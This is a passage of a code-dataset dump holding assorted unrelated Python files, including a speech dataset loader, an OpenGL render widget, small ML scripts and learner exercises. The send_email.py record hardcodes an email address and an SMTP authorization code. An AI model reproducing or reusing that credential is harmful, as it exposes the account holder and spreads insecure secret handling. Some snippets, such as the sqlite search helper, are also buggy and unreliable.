sys.argv[6]\nlogging = sys.argv[7]\nhostfile = sys.argv[8]\n\n# Get nodes of this allocation (job) and split them between the tasks\nnodelist, nNodes = parseNodeList(hostfile)\nprint(f\"\\nRunning on {nNodes} total nodes on Polaris\")\nprint(nodelist, \"\\n\")\nhosts = ','.join(nodelist)\n\n# Initialize the SmartSim Experiment\nPORT = 6780\nexp = Experiment(\"inference-example\", launcher=\"pbs\")\n\n# Set the run settings, including the Fortran executable and how to run it\nFtn_exe = './src/inferenceFtn.exe'\nif (simprocs_pn self.time_samples:\n rand_start = np.random.randint(0, max_len - self.time_samples)\n noise_waveform = numpy_waveform[\n rand_start:rand_start + self.time_samples]\n np_noise_wav = np.array(noise_waveform)\n noise_wav = torch.tensor(np_noise_wav, dtype=torch.float32)\n return self.safe_pad(noise_wav)\n\n def __getitem__(self, idx):\n if self.augment:\n the_time = int(np.modf(time())[0] * 100000000)\n np.random.seed(the_time)\n\n example_sources_paths = self.sources_paths[idx]\n\n _, noise_waveform = wavfile.read(example_sources_paths['noise_path'])\n _, speech_waveform = wavfile.read(example_sources_paths['speech_path'])\n noise_wav = self.get_padded_tensor(noise_waveform)\n speech_wav = self.get_padded_tensor(speech_waveform)\n\n # Also draw a random noise waveform if available.\n if self.extra_noise_paths:\n file_idx = np.random.randint(0, len(self.extra_noise_paths))\n _, extra_noise_waveform = wavfile.read(\n self.extra_noise_paths[file_idx])\n extra_noise_wav = self.get_padded_tensor(extra_noise_waveform)\n else:\n extra_noise_wav = torch.zeros_like(noise_wav)\n\n return speech_wav, noise_wav, extra_noise_wav\n\n def get_generator(self, batch_size=4, shuffle=True, num_workers=4):\n generator_params = {'batch_size': batch_size,\n 'shuffle': shuffle,\n 'num_workers': num_workers,\n 'drop_last': True}\n return torch.utils.data.DataLoader(self, **generator_params,\n pin_memory=True)\n\n\ndef test_generator():\n dataset_root_p = '/mnt/data/ChunkFedEnhance/'\n batch_size = 3\n sample_rate = 16000\n timelength = 4.0\n speaker_ids = [x for x in range(2)]\n time_samples = int(sample_rate * timelength)\n max_abs_snr = 5.\n data_loader = Dataset(\n root_dirpath=dataset_root_p,\n speaker_ids=speaker_ids,\n available_speech_percentage=0.5,\n split='test', sample_rate=sample_rate, timelength=timelength,\n zero_pad=True, augment=True)\n generator = data_loader.get_generator(batch_size=batch_size, num_workers=1)\n\n for speech_wavs, noise_wavs, extra_noise_wavs in generator:\n assert speech_wavs.shape == (batch_size, time_samples)\n assert noise_wavs.shape == (batch_size, time_samples)\n assert extra_noise_wavs.shape == (batch_size, time_samples)\n break\n\nif __name__ == \"__main__\":\n test_generator()\n","sub_path":"fedenhance/dataset_loader/chunked_libri_fsd.py","file_name":"chunked_libri_fsd.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"391339493","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/7/31 21:18\n# @Author : yimi\n# @File : send_email.py\n# 构造邮件内容 MIMETEXT\n# 发送邮件:登录SMTP服务器(账号,密码) --> 发送 --> 关闭链接 smtplib\nimport smtplib\nimport os\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart # 声明这个邮件是由多部分组成的\nfrom email.mime.application import MIMEApplication\nfrom task_0810_database.config_file import read_path\n\nclass SendEmail:\n def __init__(self, subject, sender, receiver, mail_text, mail_attach, auth_code):\n self.subject = subject\n self.sender = sender\n self.receiver = receiver\n self.mail_text = mail_text\n self.mail_attach = mail_attach\n self.auth_code = auth_code\n self.msg = MIMEMultipart()\n\n def send_email(self):\n # msg=MIMEMultipart()\n self.msg['Subject'] = self.subject\n self.msg['From'] = self.sender\n self.msg['To'] = self.receiver\n\n # 纯文本邮件体\n msg_text=MIMEText(self.mail_text)\n self.msg.attach(msg_text)\n\n # 附加的附件xls, html, rar\n msg_attachment=MIMEApplication(open(self.mail_attach, 'rb').read())\n msg_attachment.add_header('Content-Disposition','attachment',filename=self.mail_attach)\n self.msg.attach(msg_attachment)\n\n # 登录服务器\n s=smtplib.SMTP_SSL('smtp.qq.com', 465)\n s.login(self.sender, self.auth_code) # 账号, 授权码\n s.sendmail(self.sender,self.receiver, self.msg.as_string())\n s.close()\n\n\nif __name__==\"__main__\":\n subject = '薏米的测试报告'\n sender = '1281018605@qq.com'\n receiver = '1281018605@qq.com'\n # receiver = '281417558@qq.com'\n mail_text = 'api test result'\n html_path = os.path.join(read_path.test_report_path, 'api_test_result.html')\n mail_attach = html_path\n auth_code = 'pxqswpbzogoohahb'\n SendEmail(subject, sender, receiver, mail_text, mail_attach, auth_code).send_email()\n","sub_path":"Interface_AutoTest_07/common/send_email.py","file_name":"send_email.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"131495016","text":"# Function and PyFunction\nfrom core import aobjects as obj\nimport types as t\nfrom core.error import AILRuntimeError\nimport objects\nimport inspect\nfrom . import types\n\n\ndef pyfunc_func_init(self :obj.AILObject, func :t.FunctionType):\n self['__pyfunction__'] = func\n self['__value__'] = func\n\n\ndef pyfunc_func_call(self :obj.AILObject, *args) -> obj.AILObject:\n fobj = self['__pyfunction__']\n\n try:\n rtn = fobj(*args)\n if rtn is None:\n return obj.null\n return obj.ObjectCreater.new_object(objects.wrapper.WRAPPER_TYPE, rtn)\n except Exception as e:\n return AILRuntimeError(str(e), 'PythonError')\n\n\ndef pyfunc_func_str(self :obj.AILObject):\n return '' % (\n self['__pyfunction__'].__name__, hex(id(self['__pyfunction__'])))\n\n\ndef func_func_init(self, cobj :t.CodeType, globals :dict, name :str):\n self['__code__'] = cobj\n self['__globals__'] = globals\n self['__name__'] = name\n\n\ndef func_func_str(self :obj.AILObject):\n return '' % (self['__name__'], hex(id(self)))\n\n\ndef call(pyfw :obj.AILObject, *args):\n if inspect.isfunction(pyfw):\n try:\n return pyfw(*args)\n except Exception as e:\n return AILRuntimeError(str(e), 'PythonError')\n\n if not isinstance(pyfw, obj.AILObject):\n return AILRuntimeError('Cannot call an object that is not AILObject', 'TypeError')\n\n if pyfw['__class__'] not in (PY_FUNCTION_TYPE, FUNCTION_TYPE):\n return AILRuntimeError('%s is not callable' % pyfw['__class__'], 'TypeError')\n\n cfunc = pyfw['__pyfunction__']\n cfunc(*args)\n\n try:\n return cfunc(*args)\n except Exception as e:\n return AILRuntimeError(str(e), 'PythonError')\n\n\nFUNCTION_TYPE = obj.AILObjectType('', types.I_FUNC_TYPE,\n __init__=func_func_init,\n __str__=func_func_str,\n __repr__=func_func_str)\n\nPY_FUNCTION_TYPE = obj.AILObjectType('', types.I_PYFUNC_TYPE,\n __init__=pyfunc_func_init,\n __call__=pyfunc_func_call,\n __str__=pyfunc_func_str,\n __repr__=pyfunc_func_str)\n\n\ndef convert_to_func_wrapper(pyf):\n import inspect\n\n if obj.compare_type(pyf, PY_FUNCTION_TYPE) or \\\n obj.compare_type(pyf, FUNCTION_TYPE):\n return pyf\n\n if inspect.isfunction(pyf) or inspect.isbuiltin(pyf):\n return obj.ObjectCreater.new_object(\n PY_FUNCTION_TYPE, pyf)\n\n return obj.convert_to_ail_object(pyf)\n","sub_path":"objects/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"281992974","text":"# import os\n\nfname = \"lesson_64_sample.txt\"\n\n# try:\n# jabber = open(fname, 'r')\n# # jabber = open(\"C:\\\\Documents and Settings\\\\tim\\\\My Documents\\\\sample.txt\", 'r')\n\n# except IOError:\n# print(\"Could not read file: \", fname)\n\n# for line in jabber:\n# if \"jabberwock\" in line.lower():\n# print(line, end='')\n\n# jabber.close()\n\n# with open(fname, 'r') as jabber:\n# for line in jabber:\n# if \"JAB\" in line.upper():\n# print(line, end='')\n\n\n# with open(fname, 'r') as jabber:\n# line = jabber.readline()\n# while line:\n# print(line, end='') # end = \"\" removes newline \n# line = jabber.readline()\n\n# with open(fname, 'r') as jabber:\n# lines = jabber.readlines()\n# print(lines)\n\n# for line in lines:\n# print(line, end='')\n\n\n# with open(fname, 'r') as jabber:\n# lines = jabber.readlines()\n# print(lines)\n\n# for line in lines[::-1]:\n# print(line, end='')\n\nwith open(fname, 'r') as jabber:\n lines = jabber.read()\n\nfor line in lines[::-1]:\n print(line, end='')\n","sub_path":"Complete Python Masterclass/Source_Codes/lesson_64_fileio.py","file_name":"lesson_64_fileio.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"528718241","text":"from OpenGL.GL import *\nimport weakref\nimport numpy as np\nimport xml.etree.ElementTree as ET\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtWidgets import QOpenGLWidget\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5.QtGui import QSurfaceFormat\nfrom PyQt5.QtGui import QOpenGLVersionProfile\nfrom PyQt5.QtCore import Qt\nimport REESSimulation.api as API\nimport REESSimulation.xml as XML\nimport REESUtility.util as UTIL\nimport REESVisualization.xml as VISXML\nfrom REESVisualization.types import *\nimport REESMesh.factory as MESH_FACTORY\n\n\nOpenGL.ERROR_CHECKING = True\nOpenGL.CHECK_CONTEXT = True\n\n\nclass RenderWidget(QOpenGLWidget):\n\n def __init__(self):\n super(QOpenGLWidget, self).__init__()\n self.resize(400, 400)\n self.m_update_timer = QTimer()\n self.m_update_timer.timeout.connect(self.simulation_step)\n\n self.gl = 0\n\n self.camera = None\n self.light_setup = None\n self.grid = None\n self.clear_color = None\n self.materials = None\n self.scene_graphs = []\n self.movie_recorder = None\n self.contact_scale = 0.5\n\n self.keep_visualization = False # Controls if visualization is loaded whening opening an XML file.\n\n self.engine = None\n\n self.trackball = Trackball() # A track ball used to convert mouse move events into rotations\n self.dolly_mode = False # If on then up-down mouse moves make one moves back and forth towards target\n self.pan_mode = False # If on then one translates in the screen space\n self.trackball_mode = False # If on then one rotates around the camera center\n self.fpv_mode = False # If on then one rotates around the camera position\n self.selection_mode = False # If on then one is making a selection of an object\n self.dolly_sensitivity = 0.025\n self.pan_sensitivity = 0.025\n self.anchor_x = None # Original x-position when doing a mouse operation\n self.anchor_y = None # Original t-position when doing a mouse operation\n self.anchor_eye = None\n self.anchor_center = None\n self.anchor_up = None\n self.height = None # Used to convert from window space into screen space when clicking inside the window\n\n\n def compute_normalized_device_coordinates(self, sx, sy):\n '''\n\n :param sx: X-coordinate of screen position (x-pixel value)\n :param sy: Y-coordinate of screen position (y-pixel value)\n :return:\n '''\n viewport = glGetFloatv(GL_VIEWPORT)\n ratio = self.devicePixelRatio()\n nx = (2.0 * ratio * sx) / viewport[2] - 1.0\n ny = (2.0 * ratio * sy) / viewport[3] - 1.0\n nx = max(-1.0, min(1.0, nx))\n ny = max(-1.0, min(1.0, ny))\n return nx, ny\n\n def initializeGL(self):\n version_profile = QOpenGLVersionProfile()\n version_profile.setVersion(4, 1)\n version_profile.setProfile(QSurfaceFormat.CoreProfile)\n self.gl = self.context().versionFunctions(version_profile)\n if not self.gl:\n raise RuntimeError(\"unable to apply OpenGL version profile\")\n self.gl.initializeOpenGLFunctions()\n\n camera, light_setup, materials, clear_color, grid, mov_rec, contact_scale = VISXML.load('resources/scene.xml')\n\n self.camera = camera\n self.light_setup = light_setup\n self.materials = materials\n self.clear_color = clear_color\n self.grid = grid\n self.movie_recorder = mov_rec\n self.contact_scale = contact_scale\n\n self.scene_graphs.clear()\n self.create_grid_scene_graph()\n\n glClearColor(self.clear_color[0], self.clear_color[1], self.clear_color[2], 0.0)\n glEnable(GL_DEPTH_TEST)\n glDepthFunc(GL_LESS)\n glEnable(GL_CULL_FACE)\n\n def create_rigid_bodies_graph(self):\n\n scene_graph = SceneGraph()\n\n scene_graph.camera = self.camera\n scene_graph.light_setup = self.light_setup\n\n vertex_shader = Shader('resources/shaders/vertex.glsl', GL_VERTEX_SHADER)\n geometry_shader = Shader('resources/shaders/geometry.glsl', GL_GEOMETRY_SHADER)\n fragment_shader = Shader('resources/shaders/fragment.glsl', GL_FRAGMENT_SHADER)\n\n scene_graph.program = ShaderProgram([vertex_shader, geometry_shader, fragment_shader])\n\n for shape in self.engine.shapes.values():\n vao = VAO()\n vertex_data, index_data = create_mesh_array_data(shape.mesh)\n vbo = VBO(vertex_data, index_data)\n shape_node = ShapeNode(scene_graph.program, vao, vbo)\n scene_graph.shape_nodes[shape.name] = shape_node\n\n for body in self.engine.rigid_bodies.values():\n shape_node = scene_graph.shape_nodes[body.shape.name]\n instance = InstanceNode(shape_node, self.materials[body.visual_material], body)\n instance.update_transform(body.r, body.q)\n scene_graph.instance_nodes[body.name] = instance\n\n self.scene_graphs.append(scene_graph)\n\n def create_grid_scene_graph(self):\n scene_graph = SceneGraph()\n\n scene_graph.camera = self.camera\n scene_graph.light_setup = self.light_setup\n\n vertex_shader = Shader('resources/shaders/debug_vertex.glsl', GL_VERTEX_SHADER)\n fragment_shader = Shader('resources/shaders/debug_fragment.glsl', GL_FRAGMENT_SHADER)\n\n scene_graph.program = ShaderProgram([vertex_shader, fragment_shader])\n\n vao = VAO()\n vertex_data, index_data = create_wire_grid_data(self.grid)\n vbo = VBO(vertex_data, index_data, make_triangles=False)\n shape_node = ShapeNode(scene_graph.program, vao, vbo)\n instance = InstanceNode(shape_node, self.materials['grid'])\n scene_graph.instance_nodes['grid'] = instance\n\n self.scene_graphs.append(scene_graph)\n\n def create_contact_points_graph(self):\n scene_graph = SceneGraph()\n\n scene_graph.camera = self.camera\n scene_graph.light_setup = self.light_setup\n\n vertex_shader = Shader('resources/shaders/debug_vertex.glsl', GL_VERTEX_SHADER)\n fragment_shader = Shader('resources/shaders/debug_fragment.glsl', GL_FRAGMENT_SHADER)\n\n scene_graph.program = ShaderProgram([vertex_shader, fragment_shader])\n\n vao = VAO()\n slices = 12\n segments = 12\n\n H = 1.0/(1.0 - 1.0/8.0)\n\n base = MESH_FACTORY.make_sphere(H/8.0,slices, segments)\n shaft = MESH_FACTORY.make_cylinder(H/16.0, 5.0*H/8.0, slices)\n head = MESH_FACTORY.make_cone(H/8.0, 2.0*H/8.0, slices)\n MESH.translate(shaft, V3.make(0.0, 5.0*H/16.0, 0.0))\n MESH.translate(head, V3.make(0.0, 5.0*H/8.0, 0.0))\n\n mesh = MESH.join([base, shaft, head])\n\n vertex_data, index_data = create_mesh_array_data(mesh)\n vbo = VBO(vertex_data, index_data)\n shape_node = ShapeNode(scene_graph.program, vao, vbo)\n instance = ContactPointsInstanceNode(shape_node, self.materials['contact'], self.contact_scale, self.engine)\n scene_graph.instance_nodes['contact'] = instance\n\n self.scene_graphs.append(scene_graph)\n\n def create_joint_connectors_graph(self):\n scene_graph = SceneGraph()\n\n scene_graph.camera = self.camera\n scene_graph.light_setup = self.light_setup\n\n vertex_shader = Shader('resources/shaders/debug_vertex.glsl', GL_VERTEX_SHADER)\n fragment_shader = Shader('resources/shaders/debug_fragment.glsl', GL_FRAGMENT_SHADER)\n\n scene_graph.program = ShaderProgram([vertex_shader, fragment_shader])\n\n vao = VAO()\n slices = 12\n segments = 12\n\n H = 1.0/(1.0 - 1.0/8.0)\n\n base = MESH_FACTORY.make_sphere(H/8.0,slices, segments)\n shaft = MESH_FACTORY.make_cylinder(H/16.0, 5.0*H/8.0, slices)\n head = MESH_FACTORY.make_cone(H/8.0, 2.0*H/8.0, slices)\n MESH.translate(shaft, V3.make(0.0, 5.0*H/16.0, 0.0))\n MESH.translate(head, V3.make(0.0, 5.0*H/8.0, 0.0))\n\n mesh = MESH.join([base, shaft, head])\n\n vertex_data, index_data = create_mesh_array_data(mesh)\n vbo = VBO(vertex_data, index_data)\n shape_node = ShapeNode(scene_graph.program, vao, vbo)\n\n if 'socket' in self.materials:\n socket_material = self.materials['socket']\n else:\n raise RuntimeError('create_joint_connectors_graph(): Missing socket visual material')\n\n if 'plug' in self.materials:\n plug_material = self.materials['plug']\n else:\n raise RuntimeError('create_joint_connectors_graph(): Missing plug visual material')\n\n instance = JointConnectorsInstanceNode(shape_node,\n socket_material,\n plug_material,\n self.contact_scale,\n self.engine\n )\n scene_graph.instance_nodes['connectors'] = instance\n\n self.scene_graphs.append(scene_graph)\n\n def paintGL(self):\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n for scene_graph in self.scene_graphs:\n scene_graph.render()\n\n def resizeGL(self, width, height):\n glViewport(0, 0, width, height)\n self.height = height\n\n def mouseMoveEvent(self, e):\n x = e.x()\n y = self.height - e.y()\n\n nx, ny = self.compute_normalized_device_coordinates(x, y)\n\n left = (int(e.buttons()) & Qt.LeftButton) != 0\n middle = (int(e.buttons()) & Qt.MidButton) != 0\n right = (int(e.buttons()) & Qt.RightButton) != 0\n ctrl = (int(QApplication.keyboardModifiers()) & Qt.ControlModifier) != 0\n shift = (int(QApplication.keyboardModifiers()) & Qt.ShiftModifier) != 0\n alt = (int(QApplication.keyboardModifiers()) & Qt.AltModifier) != 0\n\n self.camera.update(self.anchor_eye, self.anchor_center, self.anchor_up)\n\n if self.dolly_mode:\n distance = self.dolly_sensitivity * (y - self.anchor_y)\n self.camera.dolly(-distance)\n\n if self.pan_mode:\n x_distance = self.pan_sensitivity * (x - self.anchor_x)\n y_distance = self.pan_sensitivity * (y - self.anchor_y)\n self.camera.pan(-x_distance, -y_distance)\n\n if self.trackball_mode:\n self.trackball.move_to(nx, ny)\n# self.trackball.move_to(x, y)\n self.camera.orbit(self.trackball.rotation_matrix.transpose())\n\n if self.fpv_mode:\n self.trackball.move_to(nx, ny)\n self.camera.rotate(self.trackball.rotation_matrix)\n\n if self.selection_mode:\n p, r = self.camera.get_ray(nx, ny)\n #self.select_tool.move_selection(p, r, self.camera.dof, self.engine)\n #update_render_manager(self.render_manager, self.engine)\n\n if not self.m_update_timer.isActive():\n self.update()\n\n def mousePressEvent(self, e):\n x = e.x()\n y = self.height - e.y()\n\n nx, ny = self.compute_normalized_device_coordinates(x, y)\n\n left = (int(e.buttons()) & Qt.LeftButton) != 0\n middle = (int(e.buttons()) & Qt.MidButton) != 0\n right = (int(e.buttons()) & Qt.RightButton) != 0\n ctrl = (int(QApplication.keyboardModifiers()) & Qt.ControlModifier) != 0\n shift = (int(QApplication.keyboardModifiers()) & Qt.ShiftModifier) != 0\n alt = (int(QApplication.keyboardModifiers()) & Qt.AltModifier) != 0\n\n if alt and left:\n self.dolly_mode = True\n elif shift and left:\n self.pan_mode = True\n self.camera.center_locked = False\n elif ctrl and left:\n self.selection_mode = True\n elif left:\n self.trackball_mode = True\n elif right:\n self.fpv_mode = True\n self.camera.center_locked = False\n\n self.trackball.reset()\n self.anchor_x = x\n self.anchor_y = y\n self.anchor_eye = np.copy(self.camera.eye)\n self.anchor_center = np.copy(self.camera.center)\n self.anchor_up = np.copy(self.camera.up)\n\n if self.trackball_mode:\n self.trackball.click_at(nx, ny)\n\n if self.fpv_mode:\n self.trackball.click_at(nx, ny)\n\n if self.selection_mode:\n p,r = self.camera.get_ray(nx, ny)\n #self.select_tool.select(p, r, self.engine )\n self.selection_mode = True\n\n def mouseReleaseEvent(self, e):\n #if self.selection_mode:\n # self.select_tool.deselect()\n self.dolly_mode = False\n self.pan_mode = False\n self.trackball_mode = False\n self.fpv_mode = False\n self.camera.center_locked = True\n self.selection_mode = False\n\n def simulation_step(self):\n did_step = API.run(self.engine)\n\n if did_step and self.movie_recorder is not None:\n self.movie_recorder.record(self)\n\n self.update()\n\n def open_file(self, filename):\n xml = ET.parse(filename)\n root = xml.getroot()\n\n if not self.keep_visualization:\n camera, light_setup, materials, clear_color, grid, mov_rec, contact_scale = VISXML.load_from_elementtree(root)\n\n self.camera = camera\n self.light_setup = light_setup\n self.materials = materials\n self.clear_color = clear_color\n self.grid = grid\n self.movie_recorder = mov_rec\n self.contact_scale = contact_scale\n\n self.scene_graphs.clear()\n self.create_grid_scene_graph()\n\n self.engine = XML.load_from_elementtree(root)\n self.create_rigid_bodies_graph()\n self.create_contact_points_graph()\n self.create_joint_connectors_graph()\n\n glClearColor(self.clear_color[0], self.clear_color[1], self.clear_color[2], 0.0)\n\n self.m_update_timer.start(1000/self.engine.solver_params.fps)\n\n self.update()\n\n def save_file(self, filename):\n root = ET.Element('scene')\n\n VISXML.save_to_elementtree(self.camera,\n self.light_setup,\n self.materials,\n self.clear_color,\n self.grid,\n self.movie_recorder,\n self.contact_scale,\n root\n )\n\n XML.save_to_elementtree(self.engine, root)\n\n UTIL.xml_pretty_indent(root)\n tree = ET.ElementTree(root)\n tree.write(filename)\n\n def set_keep_visualization(self, keep_it):\n self.keep_visualization = keep_it\n if keep_it:\n print('RenderWidget: Keeping visualization on file open')\n else:\n print('RenderWidget: Loading visualization on file open')\n\n\ndef initialize_opengl():\n format = QSurfaceFormat()\n format.setProfile(QSurfaceFormat.CoreProfile)\n format.setVersion(4, 5)\n format.setSamples(4)\n QSurfaceFormat.setDefaultFormat(format)\n\n","sub_path":"REESVisualization/widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":15149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"523082594","text":"class Solution:\n def letterCasePermutation(self, S: str):\n if len(S) == 0:\n return ''\n letters = [ele for ele in S if ele.isalpha()]\n pos = [i for i, c in enumerate(S) if c.isalpha()]\n num = [ele for ele in S if ele.isnumeric()]\n\n diff_perm = 2**len(pos)\n\n letters_uplow = [[ele.upper(), ele.lower()] for ele in letters]\n import itertools\n comb = [[*S] for i in range(diff_perm)]\n\n for i, p in enumerate(itertools.product(*letters_uplow)):\n for j, ele in enumerate(p):\n comb[i][pos[j]] = ele\n return [''.join(ele) for ele in comb]\n \ns = Solution()\na = 'f12d'\nprint(s.letterCasePermutation(a))\n\n''' \nthis is very easy, have no problem with it\nbasically take all the alpha values out and turn that into product fo iteration\n'''","sub_path":"subsets/784. Letter Case Permutation.py","file_name":"784. Letter Case Permutation.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"259794372","text":"import mock\nimport unittest\n\nfrom gameengine.controller import GameEngine\nfrom gameengine.commands import RunAwayCommand\n\n\nclass GameEngineTestCase(unittest.TestCase):\n def setUp(self):\n self.game = mock.Mock(is_finished=False)\n self.view = mock.Mock(**{\"read.return_value\": None})\n self.engine = GameEngine(self.game, self.view)\n\n def test_get_command_with_valid_command(self):\n self.view.read.return_value = \"OPEN SESAME\"\n with mock.patch(\"gameengine.controller.commands\") as mock_commands:\n command = self.engine.get_command()\n assert command == mock_commands.get.return_value\n self.view.read.assert_called_once_with(prompt=\"> \")\n mock_commands.get.assert_called_once_with(\"open sesame\")\n\n def test_get_command_with_invalid_command(self):\n self.view.read.side_effect = [\"open sesame\", None]\n with mock.patch(\"gameengine.controller.commands\") as mock_commands:\n mock_commands.get.return_value = None\n command = self.engine.get_command()\n self.view.write.assert_called_with(\"I'm sorry, I don't understand.\")\n\n def test_get_command_returns_run_away_command_on_eof(self):\n command = self.engine.get_command()\n assert isinstance(command, RunAwayCommand)\n","sub_path":"test/unit/test_controller.py","file_name":"test_controller.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"313107403","text":"import pandas as pd\nimport matplotlib.pylab as plt\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nimport argparse\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.ar_model import AR\nfrom datetime import datetime \nplt.style.use('ggplot')\n\nmonths = {'January':'1', 'February':'2', 'March':'3', 'April':'4', 'May':'5', 'June':'6',\\\n 'July':'7','August':'8', 'September':'9', 'October':'10', 'November':'11', 'December':'12'}\n\ndef format_data (date_str):\n parts = date_str.split(\"-\")\n date = datetime(int(parts[2]), int(months[parts[1]]), int(parts[0]), 0, 0, 0)\n return date \n\n\ndef plot_data (X):\n\n fig = plt.figure(figsize=(12,6))\n ax = fig.add_subplot(111)\n ax.plot(X,'o')\n plt.show()\n \n\nif __name__ == \"__main__\":\n \n parser = argparse.ArgumentParser()\n parser.add_argument('-i','--input-file',help='Input File')\n window = 24\n\n \n args = parser.parse_args()\n\n df = pd.read_csv(args.input_file) \n \n print(df.shape, df.columns)\n\n df['Date'] = [format_data(d) for d in df['Date'].to_list()] \n df.index = df['Date'].to_list()\n df = df.sort_values(by='Date')\n\n #plot_data(df['Open Price'])\n\n X = df['Open Price']\n\n decomposed = seasonal_decompose(X,freq = 12)\n\n x = decomposed.plot() #See note below about this \n plt.rcParams['figure.figsize']=(35,15)\n plt.style.use('ggplot')\n plt.show()\n\n\n df['stationary']=df['Open Price'].diff()\n X = df['stationary'].dropna()\n train_data = X.iloc[1:len(X)-window]\n test_data = X.iloc[X[len(X)-window:]]\n\n #train the autoregression model\n model = AR(train_data)\n model_fitted = model.fit()\n\n print('The lag value chose is: %s' % model_fitted.k_ar)\n print('The coefficients of the model are:\\n %s' % model_fitted.params)\n \n # make predictions \n predictions = model_fitted.predict(start=len(train_data),\\\n end=len(train_data) + len(test_data)-1, dynamic=False)\n predictions.index = X.index[len(X)-window:]\n\n\n compare_df = pd.concat([df['stationary'].tail(window),predictions],\\\n axis=1).rename(columns={'stationary': 'actual', 0:'predicted'})\n\n #plot the two values\n plt.plot(compare_df['actual'],label='Actual')\n plt.plot(compare_df['predicted'],label='Predicted')\n plt.legend()\n plt.show()\n\n\n\n","sub_path":"predictive/predict_share_price.py","file_name":"predict_share_price.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"128419806","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, LSTM, Input\nfrom keras.utils import np_utils\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.decomposition import PCA\nfrom sklearn.datasets import load_boston\nmodelpath = './model/{epoch:02d} - {val_loss:.4f}.hdf5'\n\nes = EarlyStopping(monitor = 'loss', mode = 'min', patience = 10)\ncp = ModelCheckpoint(filepath = modelpath, monitor = 'val_loss',\n mode = 'auto', save_best_only = True)\nscaler = RobustScaler()\npca = PCA(n_components = 10)\n\n\n# 1. 데이터\nx, y = load_boston(return_X_y = True)\n# print(x.shape)\n# print(y.shape)\n\n# 1-1. 데이터 분할\n\n\n# 1-2. Scaling\npca.fit(x)\nx = pca.transform(x)\n# x = scaler.fit_transform(x)\n\nx_train, x_test, y_train, y_test = train_test_split(\n x, y, test_size = 0.2, shuffle = True,\n random_state = 77)\n\nprint(x_train.shape)\nprint(x_test.shape)\nprint(y_train.shape)\nprint(y_test.shape)\n\n\n# 2. 모델링\nmodel = Sequential()\nmodel.add(Dense(32, input_shape = (10, ), activation = 'relu'))\nmodel.add(Dense(32, activation = 'relu'))\nmodel.add(Dense(64, activation = 'relu'))\nmodel.add(Dense(64, activation = 'relu'))\nmodel.add(Dense(128, activation = 'relu'))\nmodel.add(Dense(128, activation = 'relu'))\nmodel.add(Dense(1, activation = 'relu'))\n\nmodel.summary()\n\n\n# 3. 컴파일 및 훈련\nmodel.compile(loss = 'mse', metrics = ['mse'], optimizer = 'adam')\nmodel.fit(x_train, y_train, callbacks = [es, cp],\n epochs = 100, batch_size = 32, verbose = 1,\n validation_split = 0.25) # key_error : 'val_loss', cp에 val_loss를 선언했는데 validation셋을 안줬기 때문\n\n# print(hist.history.keys())\n\n\n# 4. 모델 평가\nres = model.evaluate(x_test, y_test)\nprint(res)\n\ny_pred = model.predict(x_test)\nprint(\"y_pred : \", y_pred)\n\n# 5. 성능 지표 평가\nprint(\"R2 : \", r2_score(y_test, y_pred))\n\n\n'''\nResult\nR2 Score = 0.7801983681184715\n'''","sub_path":"keras/keras73_boston_dnn.py","file_name":"keras73_boston_dnn.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"414454679","text":"#This is a function that objectifies searching for things\nimport sqlite3\nfrom tkinter import *\nconn = sqlite3.connect('names.db')\n#aconn.row_factory = sqlite3.Row\ncursor = conn.cursor()\n\ndef throwErrorBox(title, message):\n window = tk()\n window.title(title)\n l1 = Label(window, message)\n l1.pack()\n b1 = Button(window, text=\"Okay\", command=window.destroy)\n #Start the loop\n window.mainloop()\n\n\ndef searchFor(searchParam):\n results = cursor.execute(\"SELECT * from names WHERE LIKE ?\", (searchParam,))\n for row in results:\n assert row[3] == row['firstname']\n\n conn.commit()\n conn.close()\n","sub_path":"searchDB.py","file_name":"searchDB.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"159238998","text":"s = '\\n' + ' Еще ''\\n' + ' q werty ' + '\\n' + '\\n' +' 123 45 7 8 9 0 ' + '\\n' + '\\n'\nprint(s)\n\ns = s.replace('\\n', ' ')\nwhile s.find(' ') != -1:\n s = s.replace(' ', ' ')\ns=s.split()\nprint(s)\nif s[0] == 'Еще':\n s.pop(0)\nss=''\ns = ' '.join(s)\nprint(s)\nprint(ss)\nprint(type(s))\n\n\n\n#\n# n = 3\n# m = 4\n# a = []\n# b = []\n# a.append(5)\n# a.append(6)\n# b.append(a)\n# a = []\n# a.append(45)\n# b.append(a)\n# print(a)\n# 